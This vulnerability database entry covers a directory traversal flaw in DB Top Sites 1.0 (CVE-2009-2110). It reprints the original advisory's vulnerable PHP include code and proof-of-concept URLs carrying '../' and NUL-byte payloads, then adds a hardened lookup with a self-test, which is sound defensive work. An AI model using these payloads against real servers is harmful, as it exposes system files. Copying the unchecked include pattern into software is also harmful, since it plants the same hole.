jnmsolutions DB Top Sites: multiple directory traversal vulnerabilities

Vulnerability ID: 1117970    Type: Path traversal
Published: 2009-06-15    Updated: 2009-06-15
CVE: CVE-2009-2110    CNNVD ID: CNNVD-200906-298
Platform: PHP    CVSS score: 7.6
|Sources
https://www.exploit-db.com/exploits/8952
https://www.securityfocus.com/bid/44114
https://cxsecurity.com/issue/WLB-2009060163
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-298
|Details
DB Top Sites 1.0 contains multiple directory traversal vulnerabilities. When magic_quotes_gpc is disabled, a remote attacker can include and execute arbitrary local files via a ".." (dot dot) sequence in the u parameter of (1) full.php, (2) index.php and (3) contact.php. The magic_quotes_gpc condition matters because the published proof of concept relies on a trailing %00 (NUL byte) to cut off the hard-coded ".php" suffix that the scripts append to u: with magic quotes on, the NUL is escaped and the suffix survives. PHP 5.3.4 and later reject NUL bytes in file paths altogether, so on those versions the traversal can only reach files that really end in ".php".
|Exploit
######################################################################
[+] DB Top Sites v1.0 (index.php u) Local File Inclusion Vulnerability
[+] Discovered By SirGod 
[+] www.mortal-team.org
#######################################################################

[+] Local File Inclusion

 - Vulnerable code is everywhere

-------------------------------------------------------------------------------------------------------
<?php
// Excerpt of the vulnerable handler shared by index.php, full.php and contact.php.
// $u arrives straight from the request and is pasted into two include paths unchecked.
if ( $u != "" ) {

    if ( file_exists( "./sites/session/$u.session.php" ) ){
        include "./sites/session/$u.session.php";
        include "./sites/$u.php";
    }
}
-------------------------------------------------------------------------------------------------------

- PoCs

    http://127.0.0.1/[path]/full.php?u=../../../../../../BOOTSECT.BAK%00

    http://127.0.0.1/[path]/index.php?u=../../../../../../BOOTSECT.BAK%00

    http://127.0.0.1/[path]/contact.php?u=../../../../../../BOOTSECT.BAK%00


#######################################################################

# milw0rm.com [2009-06-15]
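As an added example, not code from DB Top Sites or from the advisory author, the following script places the unsafe include pattern shown above beside a hardened lookup that whitelists the site identifier and confines the resolved path to the sites directory, then exercises both against the advisory's payload. The function names, the temporary sites directory and the test payloads are assumptions constructed for this illustration.

```php
<?php
// Added example, not code from DB Top Sites or the advisory author.
// It contrasts the vulnerable include pattern from the advisory with a
// hardened lookup that (1) whitelists the site identifier and (2) confines
// the resolved path to the sites directory. Function names are assumptions.

// Vulnerable pattern: $u is concatenated into the include path unchecked.
// "../../../../etc/passwd\0" walks out of ./sites/, and on PHP < 5.3.4 with
// magic_quotes_gpc off the NUL byte makes the C library ignore the ".php"
// suffix, so any readable file can be included.
function unsafe_site_path(string $u): string
{
    return "./sites/$u.php";
}

// Hardened lookup: returns the canonical file to include, or null to refuse.
function safe_site_path(string $u, string $sitesDir): ?string
{
    // A site id is a short token of letters, digits, '-' or '_'. \A and \z
    // anchor the whole string, so "..", "/", "\\" and NUL bytes are rejected.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $u)) {
        return null;
    }

    // Resolve both the base directory and the candidate file to canonical
    // absolute paths; realpath() returns false if the file does not exist.
    $base = realpath($sitesDir);
    $candidate = realpath($sitesDir . DIRECTORY_SEPARATOR . $u . '.php');
    if ($base === false || $candidate === false) {
        return null;
    }

    // Defence in depth: even if the whitelist were loosened later, a symlink
    // or traversal that resolves outside $base is refused.
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

// Self-test against a throwaway sites directory (constructed for this example).
function run_self_test(): bool
{
    $root = sys_get_temp_dir() . '/dbts_' . bin2hex(random_bytes(4));
    $sites = "$root/sites";
    mkdir($sites, 0700, true);
    file_put_contents("$sites/demo.php", "<?php // demo site\n");

    $ok = true;
    $attacks = [
        "../../../../../../BOOTSECT.BAK\0",   // advisory PoC payload, %00 decoded
        "../../../../etc/passwd\0",
        "..",
        "demo/../demo",
        "demo\0",
    ];
    foreach ($attacks as $payload) {
        // The unsafe builder happily returns a path that escapes ./sites/.
        printf("unsafe: %s\n", addcslashes(unsafe_site_path($payload), "\0"));
        $ok = $ok && safe_site_path($payload, $sites) === null;
    }
    // A legitimate id still resolves, an unknown one is refused.
    $ok = $ok && safe_site_path('demo', $sites) === realpath("$sites/demo.php");
    $ok = $ok && safe_site_path('missing', $sites) === null;

    unlink("$sites/demo.php");
    rmdir($sites);
    rmdir($root);
    return $ok;
}

echo run_self_test() ? "all checks passed\n" : "FAILED\n";
```

Run it with `php hardened_sites.php` on PHP 7.1 or later (nullable return types). The whitelist alone stops the advisory's payload; the realpath() prefix check is kept so that a later relaxation of the pattern, or a symlink dropped into the sites directory, still cannot pull an include from outside it.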
|Affected products
JNM Solutions DB Top Sites 1.0
|References
- XF: dbtopsites-index-file-include (51120), http://xforce.iss.net/xforce/xfdb/51120
- MILW0RM: 8952, http://www.milw0rm.com/exploits/8952
- SECUNIA: 35419, http://secunia.com/advisories/35419
- OSVDB: 55118, http://osvdb.org/55118
- OSVDB: 55117, http://osvdb.org/55117
- OSVDB: 55116, http://osvdb.org/55116